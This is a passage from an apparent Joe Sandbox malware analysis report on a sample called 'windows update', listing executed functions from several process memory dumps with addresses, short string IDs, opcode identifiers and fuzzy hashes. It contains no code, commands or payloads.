                                                                                • Instruction Fuzzy Hash: ED112672504244CFCB02CF10D5C4B26BF72FB94328F24C5A9ED090B25AC336D85ACBA2
                                                                                Function 00CA0A10 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2236673712.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_ca0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d7cd671ac743eb0694c9e65858877ec8895d5df07606fbad91e7d2a6c627fbe6
                                                                                • Instruction ID: 19fb08ed886774dae563d4b15c6ef0f6e54dd0c73b4d17cde54340cb37a78a51
                                                                                • Opcode Fuzzy Hash: d7cd671ac743eb0694c9e65858877ec8895d5df07606fbad91e7d2a6c627fbe6
                                                                                • Instruction Fuzzy Hash: 6ED0C775B441158FCA04AB78D55445CB760EF8537531006B5D135C71B1D661D911D612

                                                                                Executed Functions

                                                                                Function 00BE04EC Relevance: 1.7, Strings: 1, Instructions: 452COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2353685174.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_be0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8aq
                                                                                • API String ID: 0-538729646
                                                                                • Opcode ID: 99938c2338c3d85861eba0049e3793fe7f1b5225bd7a54e07687aca3bf60ca8b
                                                                                • Instruction ID: b8fb4f63f92db0041e356a3f5856a27e3b13cf0bed8e83cd45c9fb74e969fdb4
                                                                                • Opcode Fuzzy Hash: 99938c2338c3d85861eba0049e3793fe7f1b5225bd7a54e07687aca3bf60ca8b
                                                                                • Instruction Fuzzy Hash: 02F0A03094A284DFCB02DFB8ED5199E7FB8AF4720071086DAC448EB2A2C5749E06DB52
                                                                                Function 00BE0888 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2353685174.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_be0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP]q
                                                                                • API String ID: 0-2175968468
                                                                                • Opcode ID: 3a06c8e19d71c1aad00c221b7679c1d2f0e3e947c2bae7a186791665c1102460
                                                                                • Instruction ID: fb8f52e1f7802e8554b06b87dde181bc8ea24906719b0873dba5c84a99d10db6
                                                                                • Opcode Fuzzy Hash: 3a06c8e19d71c1aad00c221b7679c1d2f0e3e947c2bae7a186791665c1102460
                                                                                • Instruction Fuzzy Hash: 53415A347402108FCB58EF79D59892E7BE2BF8971572549ADE806CB3B6DA35DC42CB80
                                                                                Function 00BE0898 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2353685174.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_be0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP]q
                                                                                • API String ID: 0-2175968468
                                                                                • Opcode ID: c147447e874ae273fc5d9447b538b9fb0a2892ff8c73c19fac148ec9fb04bcd7
                                                                                • Instruction ID: 9c9b5e2e03cf436dd14a51d00da518b5900b3db27b3f3f4068cff4f93903efc8
                                                                                • Opcode Fuzzy Hash: c147447e874ae273fc5d9447b538b9fb0a2892ff8c73c19fac148ec9fb04bcd7
                                                                                • Instruction Fuzzy Hash: 084139747402108FCB58EF79C55892D7BE6BF8871572549A8E806CB3B6DE39DC42CB80
                                                                                Function 00BE0A40 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2353685174.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_be0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $]q
                                                                                • API String ID: 0-1007455737
                                                                                • Opcode ID: bcd8a64e90710ca7feaa643583b922a49f186a0ff73d879d5592ec5ebbc3d2f4
                                                                                • Instruction ID: 6720dd4b631f57c495de44fd641569711fbb715cd906cd6a0257a70c49e4fb1f
                                                                                • Opcode Fuzzy Hash: bcd8a64e90710ca7feaa643583b922a49f186a0ff73d879d5592ec5ebbc3d2f4
                                                                                • Instruction Fuzzy Hash: 142101327243598FD724AA7EE880A6A77E9FF84718B1840BAD409C7251DBB1DC428790
                                                                                Function 00BE0848 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2353685174.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_be0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8aq
                                                                                • API String ID: 0-538729646
                                                                                • Opcode ID: 17eef764d887da0678ea74039a69c2c9178497e04a31cdbb3e9ab29662e10d67
                                                                                • Instruction ID: c5550f4ada71793883d6a5a72340c6c27e0ccd82d4641ad236327aeb037995b6
                                                                                • Opcode Fuzzy Hash: 17eef764d887da0678ea74039a69c2c9178497e04a31cdbb3e9ab29662e10d67
                                                                                • Instruction Fuzzy Hash: 40E0C230A0020DEFCB04EFB8EA4195EB3BDEB84244B2086A8D408E3254DA30EF009B81
                                                                                Function 00A4D508 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2351384680.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_a4d000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2fea090b337ffafe3936e2536af4058c5b78f0ef5c18d3f785cdc36837c73054
                                                                                • Instruction ID: 5d8d05f7cf8721804c9ddea0b7328ad985ab6fb28e66f5b12a5ce238914ab94c
                                                                                • Opcode Fuzzy Hash: 2fea090b337ffafe3936e2536af4058c5b78f0ef5c18d3f785cdc36837c73054
                                                                                • Instruction Fuzzy Hash: 2E213779504204DFCB05DF14D9C0F26BF65FBD8318F24C5A9E9094B25AC73AD816DBA2
                                                                                Function 00A4D503 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2351384680.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_a4d000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: b92a546229195560924ca02169dede0dc6be0d799c1bc4a1dbc3916dee9d75d8
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: 3A11D376504240DFCB16CF10D5C4B16BF72FB94318F24C5A9D9094B256C336D85ACBA2
                                                                                Function 00BE0A10 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2353685174.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_be0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ef98a923eeb92bc98d0de36d3c55f3ba1b3a4b7d214fca775d613238771da68f
                                                                                • Instruction ID: 49170521682d364a325cf86600eda98f8efcc46e85013a500ad6cf9be7e1c70c
                                                                                • Opcode Fuzzy Hash: ef98a923eeb92bc98d0de36d3c55f3ba1b3a4b7d214fca775d613238771da68f
                                                                                • Instruction Fuzzy Hash: 27D0C976B842198FCA04BBB8E95489CB7A1EF8837531006B6E139C72B1EB65D911C612

                                                                                Executed Functions

                                                                                Function 028A04EC Relevance: 1.7, Strings: 1, Instructions: 452COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8aq
                                                                                • API String ID: 0-538729646
                                                                                • Opcode ID: ce9a9cf7a66c00b06961099bb9d8d47be4ca97c57ce10ebd6328466e9421145f
                                                                                • Instruction ID: 053c0fe146976267493f29504964e7c8b184b29da49ab9319639ae1cbd84de96
                                                                                • Opcode Fuzzy Hash: ce9a9cf7a66c00b06961099bb9d8d47be4ca97c57ce10ebd6328466e9421145f
                                                                                • Instruction Fuzzy Hash: F2F0E975C093889FCB12DFF4AC609DDBBB99E4620071045D5C44CDB262DA319D05CB61
                                                                                Function 028A0888 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP]q
                                                                                • API String ID: 0-2175968468
                                                                                • Opcode ID: 0f8978310c461490f10a3d3996b6f0395efe10165c74e82ad71fb1586a6d0ca3
                                                                                • Instruction ID: 26eac9eea3933a9634d40d032234f3a8cf8f449c19572a08e979a95463373445
                                                                                • Opcode Fuzzy Hash: 0f8978310c461490f10a3d3996b6f0395efe10165c74e82ad71fb1586a6d0ca3
                                                                                • Instruction Fuzzy Hash: 27414A78B406108FDB58AF78C86892D7BE2BF8971571509A8E40ACB3B5DF35DC02CB90
                                                                                Function 028A0898 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP]q
                                                                                • API String ID: 0-2175968468
                                                                                • Opcode ID: 2b96fdf0b4fe331f346f19b37ab4ecba759187467ee78f1d37cd1ff6f1744142
                                                                                • Instruction ID: 002f266f3868c6a0c47dde7f2aebe4546b7b56f6dabd6b40fa6dae41d342ee91
                                                                                • Opcode Fuzzy Hash: 2b96fdf0b4fe331f346f19b37ab4ecba759187467ee78f1d37cd1ff6f1744142
                                                                                • Instruction Fuzzy Hash: 834128787502108FCB58AF79C45892D7BE6BF89B1572548A8E80ACB3B5DF35DC02CB90
                                                                                Function 028A0A40 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $]q
                                                                                • API String ID: 0-1007455737
                                                                                • Opcode ID: fa073c87f76d5436a847583d096ce3878bccf092eab60efe3c4bba6ef6f64513
                                                                                • Instruction ID: 3e8a2d8a4028371a58fcb5c287f575283a67eec53b49adb88258b7a8844fe773
                                                                                • Opcode Fuzzy Hash: fa073c87f76d5436a847583d096ce3878bccf092eab60efe3c4bba6ef6f64513
                                                                                • Instruction Fuzzy Hash: 9421043A7443159FEB248A7DE8A0B2B77E9EF80628714443AD00EC7291DF71E812C790
                                                                                Function 028A0848 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8aq
                                                                                • API String ID: 0-538729646
                                                                                • Opcode ID: 85240802cf3559e4a131634f6c9121d6b9cb9757d0b15b5cca7d65cd7374ee31
                                                                                • Instruction ID: d93b73fa7e52b290c7905fcb2eb129d636f6249398c5b05933aa6626972a7c7c
                                                                                • Opcode Fuzzy Hash: 85240802cf3559e4a131634f6c9121d6b9cb9757d0b15b5cca7d65cd7374ee31
                                                                                • Instruction Fuzzy Hash: 4CE08C30A0420DEBCB01EFB8EA4094EF7AAEB44244B2085A8840CA7254DA30AE009B91
                                                                                Function 0275D508 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433121558.000000000275D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0275D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_275d000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 32859998eaf728c3c4608a2351c359019ba9f55efbc857fbdfdba62047d76c6d
                                                                                • Instruction ID: bfb4950c0aba9652c2d20719c79f1c22be64b105bf5e63e5b43b8dcbe3db474f
                                                                                • Opcode Fuzzy Hash: 32859998eaf728c3c4608a2351c359019ba9f55efbc857fbdfdba62047d76c6d
                                                                                • Instruction Fuzzy Hash: B6214571500224DFDB25DF14D9C0F26FF66FB88318F208569ED0A0B256C3BAD416C7A2
                                                                                Function 0275D503 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433121558.000000000275D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0275D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_275d000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: 632da462ab3781a994d44e401a29bc9b11409299511ec791a8585af932e6e095
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: AC11AC76504280DFDB16CF10D9C4B16FF72FB88328F2486A9DD094B256C37AD45ACBA2
                                                                                Function 028A0A10 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8beae76e40544d2febd9bef4b7b750c0ba302cda3bf6d0354c896e0fadf8eff5
                                                                                • Instruction ID: 60934e4545a9ffa82ea30b136315e0dac115e183e82cb0d23a31ddc78d6a9558
                                                                                • Opcode Fuzzy Hash: 8beae76e40544d2febd9bef4b7b750c0ba302cda3bf6d0354c896e0fadf8eff5
                                                                                • Instruction Fuzzy Hash: 9AD0C779B441148FDA04AB78D55445CB760EF8427531006B5D136C71B1DA61D911C612